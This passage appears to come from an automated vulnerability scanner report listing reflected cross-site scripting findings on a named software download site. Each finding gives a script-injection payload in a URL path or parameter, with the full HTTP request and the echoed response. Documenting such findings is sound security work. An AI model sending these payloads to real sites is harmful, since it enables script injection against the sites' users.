Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89997


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-web-development-downloads-14-0-d.html?80afd"><script>alert(1)</script>c425ef0f66e=1" />
...[SNIP]...

4.1707. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218d1"><script>alert(1)</script>4fe331af1de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories218d1"><script>alert(1)</script>4fe331af1de/free-64-bit-widgets-downloads-304-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:38:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories218d1"><script>alert(1)</script>4fe331af1de/free-64-bit-widgets-downloads-304-0-d.html" />
...[SNIP]...

4.1708. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba48e"><script>alert(1)</script>61cde841274 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-widgets-downloads-304-0-d.htmlba48e"><script>alert(1)</script>61cde841274 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-widgets-downloads-304-0-d.htmlba48e"><script>alert(1)</script>61cde841274" />
...[SNIP]...

4.1709. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6112f"><script>alert(1)</script>21955c1c69b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-widgets-downloads-304-0-d.html?6112f"><script>alert(1)</script>21955c1c69b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-widgets-downloads-304-0-d.html?6112f"><script>alert(1)</script>21955c1c69b=1" />
...[SNIP]...

4.1710. http://www.x64bitdownload.com/contact.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /contact.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27828"><script>alert(1)</script>f86c420dbde was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.html27828"><script>alert(1)</script>f86c420dbde HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/contact.html27828"><script>alert(1)</script>f86c420dbde" />
...[SNIP]...

4.1711. http://www.x64bitdownload.com/contact.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /contact.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa263"><script>alert(1)</script>331e6222b82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.html?aa263"><script>alert(1)</script>331e6222b82=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/contact.html?aa263"><script>alert(1)</script>331e6222b82=1" />
...[SNIP]...

4.1712. http://www.x64bitdownload.com/contact.html [subject parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /contact.html

Issue detail

The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1b9"><script>alert(1)</script>4fd62328ec8 was submitted in the subject parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.html?subject=Advertising+inquirybe1b9"><script>alert(1)</script>4fd62328ec8 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/contact.html?subject=Advertising+inquirybe1b9"><script>alert(1)</script>4fd62328ec8" />
...[SNIP]...

4.1713. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b3ae"><script>alert(1)</script>c6880b6a8ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download9b3ae"><script>alert(1)</script>c6880b6a8ca/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:46:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/download9b3ae"><script>alert(1)</script>c6880b6a8ca/t-64-bit-ozum-download-lhtivuds.html" />
...[SNIP]...

4.1714. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60197"><script>alert(1)</script>0962c697c9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download/t-64-bit-ozum-download-lhtivuds.html60197"><script>alert(1)</script>0962c697c9d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:41 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 24926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/download/t-64-bit-ozum-download-lhtivuds.html60197"><script>alert(1)</script>0962c697c9d" />
...[SNIP]...

4.1715. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 609f9"><script>alert(1)</script>bd02fd97db3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download/t-64-bit-ozum-download-lhtivuds.html?609f9"><script>alert(1)</script>bd02fd97db3=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:14 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 24929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/download/t-64-bit-ozum-download-lhtivuds.html?609f9"><script>alert(1)</script>bd02fd97db3=1" />
...[SNIP]...

4.1716. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be9bd"><script>alert(1)</script>d2897fb4cc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsbe9bd"><script>alert(1)</script>d2897fb4cc0/t-64-bit-communitymate-download-qeakzpwv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsbe9bd"><script>alert(1)</script>d2897fb4cc0/t-64-bit-communitymate-download-qeakzpwv.html" />
...[SNIP]...

4.1717. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a075"><script>alert(1)</script>b0edf73ede1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-communitymate-download-qeakzpwv.html1a075"><script>alert(1)</script>b0edf73ede1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-communitymate-download-qeakzpwv.html1a075"><script>alert(1)</script>b0edf73ede1"/>
...[SNIP]...

4.1718. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 528e0"><script>alert(1)</script>cb345b92cc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-communitymate-download-qeakzpwv.html?528e0"><script>alert(1)</script>cb345b92cc2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55744


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-communitymate-download-qeakzpwv.html?528e0"><script>alert(1)</script>cb345b92cc2=1"/>
...[SNIP]...

4.1719. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5108"><script>alert(1)</script>438beac92ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadse5108"><script>alert(1)</script>438beac92ff/t-64-bit-cyberlink-youcam-download-gspvirzx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:23:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadse5108"><script>alert(1)</script>438beac92ff/t-64-bit-cyberlink-youcam-download-gspvirzx.html" />
...[SNIP]...

4.1720. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14f07"><script>alert(1)</script>b0b929cccfa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html14f07"><script>alert(1)</script>b0b929cccfa HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html14f07"><script>alert(1)</script>b0b929cccfa"/>
...[SNIP]...

4.1721. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2918"><script>alert(1)</script>0c97ca17470 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html?b2918"><script>alert(1)</script>0c97ca17470=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56811


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html?b2918"><script>alert(1)</script>0c97ca17470=1"/>
...[SNIP]...

4.1722. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12bf9"><script>alert(1)</script>6fe8131d792 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads12bf9"><script>alert(1)</script>6fe8131d792/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:23:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads12bf9"><script>alert(1)</script>6fe8131d792/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html" />
...[SNIP]...

4.1723. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742ce"><script>alert(1)</script>f2561d7c8fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html742ce"><script>alert(1)</script>f2561d7c8fe HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59993


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html742ce"><script>alert(1)</script>f2561d7c8fe"/>
...[SNIP]...

4.1724. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

